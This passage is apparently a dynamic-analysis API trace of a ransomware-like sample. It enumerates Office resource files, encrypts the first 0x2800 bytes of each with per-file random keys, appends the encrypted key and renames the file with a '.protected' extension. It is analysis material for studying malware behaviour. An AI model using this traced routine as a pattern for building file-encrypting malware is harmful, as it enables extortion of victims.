lpString2="$Recycle.bin") returned 1 [0067.406] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.406] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\..") returned 54 [0067.406] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.406] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.406] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.406] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="Windows") returned -1 [0067.407] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.407] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.407] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.407] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.407] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll") returned 72 [0067.407] StrStrIW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.407] lstrcmpW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.407] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.407] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.407] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.407] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll") returned 72 [0067.407] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.407] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll") returned 72 [0067.407] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.407] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll") returned 72 [0067.407] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.407] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.417] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.418] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.418] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.418] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.544] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.544] CloseHandle (hObject=0xd8) returned 1 [0067.544] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.protected") returned 82 [0067.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll.protected")) returned 1 [0067.544] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.544] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="Windows") returned -1 [0067.544] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.545] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.545] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.545] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.545] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll") returned 72 [0067.545] StrStrIW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.545] lstrcmpW (lpString1="GRINTL32.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.545] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.545] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.545] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll") returned 72 [0067.545] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll") returned 72 [0067.545] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll") returned 72 [0067.545] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.546] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.586] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.586] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.586] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.586] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.608] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.608] CloseHandle (hObject=0xd8) returned 1 [0067.609] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.protected") returned 82 [0067.609] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll.protected")) returned 1 [0067.609] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.609] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="Windows") returned -1 [0067.609] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="Program Files") returned -1 [0067.609] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.609] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.609] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="System Volume Information") returned -1 [0067.609] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll") returned 73 [0067.609] StrStrIW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".protected") returned 0x0 [0067.610] lstrcmpW (lpString1="GRINTL32.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.610] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.610] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.610] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll") returned 73 [0067.610] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".txt") returned 0x0 [0067.611] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll") returned 73 [0067.611] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".rar") returned 0x0 [0067.611] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll") returned 73 [0067.611] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".zip") returned 0x0 [0067.611] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.629] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.629] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.629] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.629] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.630] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.630] CloseHandle (hObject=0xd8) returned 1 [0067.631] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.protected") returned 83 [0067.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll.protected")) returned 1 [0067.631] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.631] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="Windows") returned -1 [0067.631] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.631] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.631] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.631] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.631] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll") returned 69 [0067.631] StrStrIW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.631] lstrcmpW (lpString1="MAPIR.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.631] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.632] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.632] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.635] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll") returned 69 [0067.635] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.635] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll") returned 69 [0067.635] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.635] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll") returned 69 [0067.635] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.636] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.645] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.646] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.646] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.646] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.647] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.647] CloseHandle (hObject=0xd8) returned 1 [0067.648] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.protected") returned 79 [0067.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll.protected")) returned 1 [0067.649] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.649] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="Windows") returned -1 [0067.649] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="Program Files") returned -1 [0067.649] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.650] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.650] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="System Volume Information") returned -1 [0067.650] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll") returned 72 [0067.650] StrStrIW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".protected") returned 0x0 [0067.650] lstrcmpW (lpString1="MOR6INT.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.650] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.650] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.650] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.650] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll") returned 72 [0067.650] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".txt") returned 0x0 [0067.650] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll") returned 72 [0067.650] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".rar") returned 0x0 [0067.650] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll") returned 72 [0067.650] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".zip") returned 0x0 [0067.651] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.673] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.673] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.674] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.674] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0067.703] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0067.703] CloseHandle (hObject=0xd8) returned 1 [0067.704] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.protected") returned 82 [0067.704] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll.protected")) returned 1 [0067.704] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0067.704] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0067.704] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0067.704] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0067.704] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0067.704] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0067.704] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll") returned 71 [0067.704] StrStrIW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0067.704] lstrcmpW (lpString1="MSOINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0067.704] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0067.704] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0067.704] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0067.705] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll") returned 71 [0067.705] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0067.705] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll") returned 71 [0067.705] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0067.705] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll") returned 71 [0067.705] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0067.705] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.713] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.713] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, 